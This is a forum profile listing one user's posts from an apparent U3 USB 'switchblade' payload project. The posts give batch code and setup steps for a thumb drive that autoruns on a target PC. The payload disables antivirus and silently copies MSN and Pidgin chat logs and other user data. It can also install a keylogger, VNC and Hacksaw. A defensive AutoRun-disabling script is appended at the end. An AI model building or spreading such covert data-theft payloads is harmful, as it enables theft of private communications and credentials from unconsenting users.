
Tmbomber

Active Members
Posts: 59

Everything posted by Tmbomber

  1. I'm available for testing as well :) (actually I never left, just been rather busy so I haven't been posting :) )
  2. We have Thanksgiving now and Christmas break coming up. Give'em time.
  3. Leapo said a couple weeks ago that he can't do anything with the payload during the week. He's only working on it as he has time on weekends.
  4. Things to try: On your safetied machine, run Menu.bat and disable everything. Turn on system information. On your target machine, turn off the antivirus. (The AVKill feature isn't working right now. We're working on it.) On your target machine, verify that autorun is turned on. (I don't remember how to check that.) *Then* stick your thumb drive in. Please report back what happened.
  5. Ok, yes, we *do* expect everybody to read all 29 pages of this thread. When I found this forum I read all the pinned threads (they're pinned for a reason). I also read about half the other threads. There's all kinds of things to learn there. This goes against my better judgment, but...
      When you install the Universal Customizer, it puts a "Universal_Customizer" directory in C:\. Inside that directory you will find a few sub-directories. Before you do anything, create a text file in C:\ and name it "safety.txt". That'll keep you from hosing yourself.
      If you wanna do a payload from source files, empty the "c:\Universal_Customizer\U3CUSTOM\" sub-directory. Leapo's payload has two parts, a "U3 ISO Source" directory and a "Flash Partition" directory. Everything in the U3 ISO Source directory gets copied into "c:\Universal_Customizer\U3CUSTOM\". Then double click on "c:\Universal_Customizer\ISOCreate.cmd". That will run a batch file that will create the .ISO file and put it where it belongs.
      If you have a .iso file, rename it "U3CUSTOM.ISO" and move it into "c:\Universal_Customizer\bin".
      In either case, have your U3 thumb drive already plugged in and click on "Universal_Customizer.exe" (you'll find it in "c:\Universal_Customizer\"). Follow instructions *exactly*, especially the bit at the end where it has you extract the thumb drive and re-insert it. I don't think it matters if you close the window first, but I always extract, re-insert, then close the customizer.
      NOTE: Some payloads don't have anything to copy to the non-U3 partition of your thumb drive. Gonzor's and Leapo's do. For Leapo's, copy the contents of the "Flash Partition" sub-directory (that I mentioned above) to the second partition on the thumb drive. Open the non-U3 partition and run "Menu.bat" to configure the payload. For Gonzor's, copy "SBConfig-V2.0.18.exe" (or whatever the current version is) to the non-U3 partition and run it.
      Here's a tip if you're re-flashing a thumb drive. Delete the logs from the flash partition. One of the steps that the Universal Customizer does is to archive and restore the flash partition. Sometimes there are files in the logs that don't make it through that process. Better to get rid of them first.
  6. I tried this and still got the "No Disk" error. When the error popped up I left it there and took a look to see how far along the log file was. It was hung up in "Network Services". I turned the "Network Services" dump off and it ran silently (with everything else except slurp2 and the installers turned on). I have no idea why it'd give the error there.
  7. I think I found some source code for AVKill. http://www.datastronghold.com/archive/t13290.html
  8. Anybody seen Leapo around anywhere??? He hasn't posted in over a week. HEY LEAPO!!!! I hope you're on vacation and resting yer brain a lot... We're all missing ya here.
  9. I had a problem of the batch file not finding the "FIND" command. I made mine look like:
        ver|%windir%\system32\find.exe "[Version 5.00."
      I need to check if win2k has a system32 directory. (It'd probably be easiest to just put a copy of the "FIND" command on the thumbdrive.)
  10. Whoops... just deleted what was here. I confused myself... Put this:
        IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1
        mkdir %logdir%\Slurp_Data\
        tree /F /A C:\ > %logdir%\Slurp_Data\tree.log 2>&1
        assoc > %logdir%\Slurp_Data\assoc.log 2>&1
        driverquery > %logdir%\Slurp_Data\driver.log 2>&1
      right at the beginning of the slurp1 code block. I think Leapo was going to put a switch in to turn that on and off.
  11. *That*, is the infamous "No Disk" error that we've been talking about. It seems to stem from drive letters that show up in the list of drives that aren't actually drives. (such as on a laptop that has a CF slot when there's no CF card plugged into the slot) Leapo is presently working on a solution. Hey Leapo!!! How's that coming??? :)
  12. SanDisk sells a 3 pack of 2 gig thumbdrives colored Red, White, & Blue. You can also get a single one that's Black. I keep the white one stock (white being pure). The blue one has everything turned on except the installers and Slurp2. The red one only has "System Information" and the VNC installer. I'm thinking of what to do with the black one. As soon as I go through the other installers I'll probably have the black one be VNC (and maybe NMAP) and the red one have all 4 installers.
  13. Still looking into VNC. I just tried it on a win2k machine and it failed to install. The actual line that failed was:
        REGEDIT /s %installdir%\VNC\vnc.reg 2>&1
      I'm not sure exactly what went wrong there. Also, Leapo, I had a thought... You were thinking of using the serial number of the USB drive to identify it. Would it be possible to run the test to see if the drive has *any* serial number, and then if it does, do the test we're doing now? That way it wouldn't do the IF EXIST test unless there was actually a drive there to test. Just a thought...
  14. Moderator assistance in thread one... (could some nice moderator split the backtrack stuff off to a new thread please???)
  15. c.f. post 324 above. This is a known problem that exists if you have a USB card adapter. (one of those things that let you plug CF cards and SD cards and Smart Cards into your PC via a USB port) I have one on my home pc. Removing it makes the problem go away. I also have one built into my laptop at work... Can't remove that one. The problem stems from the drive detection portion of the payload. Leapo's previous post explains how he's trying to get around that. For the time being, just hit "Cancel" when that error pops up. (you may have to hit it several times.) Hey Leapo, I haven't checked, but could the problem also be in the go.vbs file???
  16. Scratch all that.... Made the start of Slurp1 look like:
        IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1
        mkdir %logdir%\Slurp_Data\
        tree /F /A C:\ > %logdir%\Slurp_Data\tree.log 2>&1
        assoc > %logdir%\Slurp_Data\assoc.log 2>&1
        driverquery > %logdir%\Slurp_Data\driver.log 2>&1
        :: MSN Received Files and chatlogs
        mkdir %logdir%\Slurp_Data\MSN\
        fc.exe "%USERPROFILE%\My Documents\My Received Files\*" "%logdir%\Slurp_Data\MSN\*" /i /o
      That worked just fine, and kept the main log file looking a lot nicer. And my idea on getting around the adapter drives failed abysmally. So Leapo, I hope your idea pans out :)
  17. Added a block down near the end:
        IF NOT EXIST %config%\Port_Scan.cfg GOTO SkipPortScan
        ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
        ECHO + [Port Scan] + >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
        .\portqry -local -v -v >> %log% 2>&1
        :SkipPortScan
        IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1a
        ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
        ECHO + [File Type Associations] + >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
        assoc >> %log% 2>&1
        ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
        ECHO + [Driver Info] + >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
        driverquery >> %log% 2>&1
        ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
        ECHO + [C:\ Tree Listing] + >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
        tree /F /A C:\ >> %log% 2>&1
        :SkipSlurp1a
        ECHO. >> %log% 2>&1
        ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
        ECHO Leapos Payload [Time Finished: %date% %time%] >> %log% 2>&1
        ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
      I have it key off of Slurp1 (it seems to be that kinda data). I'm thinking of having the tree stored in the slurp folder as a separate file so it doesn't make the log file huge. I'll think on that one. Still haven't tried the installers. Everything else looks good at the moment. Going to try and figure out an easy way to ignore the USB card adapter drives. Then try the installers.
  18. I made some changes, used the Universal Customizer just like I have a hundred times, and botched everything. For some reason I couldn't get my U3 thumb drive to auto launch. I thought I might have trashed it, so I dug out a new one and gave that a shot. Still had the same problem. No idea what I did. In all the mess, I think I've figured out where the no disk errors are coming from. In the beginning of Start.bat is the block of code that figures out what the drive letter is. It starts at Z: and works its way backwards. My previous thumb drive mapped its two partitions to M: and N: and the payload would run without the "No Disk" errors. Well, this new thumb drive mapped to E: and F: and for some reason the errors came back. Four of them. It just so happens I have one of those 11-in-1 adapters that lets me plug in CF cards and such. The adapter connects to a USB port and creates FOUR new drive letters. FOUR??????!!!?!?!?!?!!!!!! I checked. If you click on one of those without a card in its corresponding slot you get a "Please insert disk" pop-up window. I verified this was the problem by disconnecting the adapter. The "No Disk" errors went away. It appears that the "No Disk" errors are coming from the "IF EXIST" lines that are trying to access drives that show up but aren't really there. At the moment, I don't have a solution for this, but it at least explains things.
  19. Running: Microsoft Windows 2000 5.00.2195 Service Pack 4
      I get: Microsoft Windows 2000 [Version 5.00.2195]
      Running: Microsoft Windows XP Professional Version 2002 Service Pack 2
      I get: Microsoft Windows XP [Version 5.1.2600]
      Running: Microsoft Windows XP Professional Version 2002 Service Pack 3 v.3282
      I get: Microsoft Windows XP [Version 5.1.2600]
      Running: Microsoft Windows XP Professional x64 Edition Version 2003 Service Pack 2
      I get: Microsoft Windows [Version 5.2.3790]
      I find it odd that XP sp2 & XP sp3 report the same VER results. I'm working on getting information on what you get from Vista x64. For the find command, I'd use "[Version x.x". Something like this...
        :: find sets errorlevel 0 when the string is found and 1 when it is not,
        :: so "if errorlevel 1" means "not found"; test for a match with NOT.
        ver|find "[Version 5.00."
        if not errorlevel 1 goto SetOSwin2k
        ver|find "[Version 5.1."
        if not errorlevel 1 goto SetOSXP32
        ver|find "[Version 5.2."
        if not errorlevel 1 goto SetOSXP64
        ver|find "[Version 6.0."
        if not errorlevel 1 goto SetOSVISTA32
        ver|find "[Version 6.???"
        if not errorlevel 1 goto SetOSVISTA64
        :SetOSDefault
        goto SetOSXP32
        :SetOSwin2k
        SET CurrentOS=win2k
        GOTO EndDetect
        :SetOSXP32
        SET CurrentOS=XP32
        GOTO EndDetect
        :SetOSXP64
        SET CurrentOS=XP64
        GOTO EndDetect
        :SetOSVISTA32
        SET CurrentOS=VISTA32
        GOTO EndDetect
        :SetOSVISTA64
        SET CurrentOS=VISTA64
        GOTO EndDetect
        :EndDetect
      I added a default to XP32 on the off chance the tests fail.
  20. Ok, starting on the installable stuff... I notice that the keylogger and NMAP don't have antidotes available, so I'll be starting with debugging Hacksaw and VNC. Does anybody know if the antidote files for these clean stuff out completely? I'm going to be infecting and curing my test machines multiple times and wanna be sure I can clean my slate before each test. Also, is Gonzor still around? His site's been down for ages, so his External IP stuff isn't working.
  21. Changed this so it would work on Win2k...
        IF NOT EXIST %config%\Network_Services.cfg GOTO SkipNetServices
        ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
        ECHO + [Network Services] + >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
        IF EXIST "C:\Program Files (x86)" GOTO NSD1
        IF EXIST "C:\Windows" GOTO NSD1
        netstat.exe -an >> %log% 2>&1
        GOTO SkipNetServices
        :NSD1
        netstat.exe -abn >> %log% 2>&1
        :SkipNetServices
  22. Hey TNTUNUS, is AVKILL working??? (silently???) What AV software have you tried it against???
  23. Ok, *that* worked fine... Also, added the following to the Slurp section:
        :: Pidgin Data
        mkdir %logdir%\Slurp_Data\Pidgin\
        xcopy "C:\Documents and Settings\%username%\Application Data\.purple\*" "%logdir%\Slurp_Data\Pidgin\*" /s /c /q /r /h /y
      .purple as a directory name seems odd to me. Anybody else out there have Pidgin set up who can check that they have the same directory tree???
  24. DOH!!!!
        IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1
        IF EXIST "C:\Program Files" SET progfiles="C:\Program Files"
        IF EXIST "C:\Program Files (x86)" SET progfiles="C:\Program Files (x86)"
      Should read as....
        IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1
        IF EXIST "C:\Program Files" SET progfiles=C:\Program Files
        IF EXIST "C:\Program Files (x86)" SET progfiles=C:\Program Files (x86)
      Ok, that oughta make Yahoo slurp.
  25. As I said, I'd love to give it a try as well.
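Post 4 above asks how to check whether autorun is turned on, which is the setting a U3 launchpad partition (the emulated CD-ROM built from the U3 ISO) depends on to start a payload. The following batch script is an added example, not code from this thread or from Leapo's payload, written from the defender's side: it reports the NoDriveTypeAutoRun policy value and, when run with the argument "disable", sets it to 0xFF so autorun.inf is ignored on every drive type. It assumes reg.exe is present (shipped with Windows XP and later) and that it is run from an administrator prompt.

```batch
@echo off
rem check_autorun.bat - added example, not part of the thread's payload.
rem Shows the AutoRun policy and, with "disable", turns AutoRun off for
rem all drive types so an inserted U3 stick cannot auto-launch anything.
rem Assumes reg.exe (Windows XP and later) and an administrator prompt.
setlocal
set KEY_HKLM=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
set KEY_HKCU=HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer

echo Machine-wide AutoRun policy:
reg query "%KEY_HKLM%" /v NoDriveTypeAutoRun 2>nul || echo   (not set: Windows default applies, AutoRun is ON)
echo Per-user AutoRun policy:
reg query "%KEY_HKCU%" /v NoDriveTypeAutoRun 2>nul || echo   (not set)

if /i "%~1"=="disable" (
    rem 0xFF sets the bit for every drive type, including CD-ROM,
    rem which is what the U3 launchpad partition presents itself as.
    reg add "%KEY_HKLM%" /v NoDriveTypeAutoRun /t REG_DWORD /d 0xFF /f
    reg add "%KEY_HKCU%" /v NoDriveTypeAutoRun /t REG_DWORD /d 0xFF /f
    echo AutoRun disabled. Log off and back on so Explorer picks up the policy.
)
endlocal
```

A value of 0x95 (the old Windows XP default) leaves CD-ROM drives, and so a U3 launchpad, allowed to autorun; only 0xFF covers every drive type.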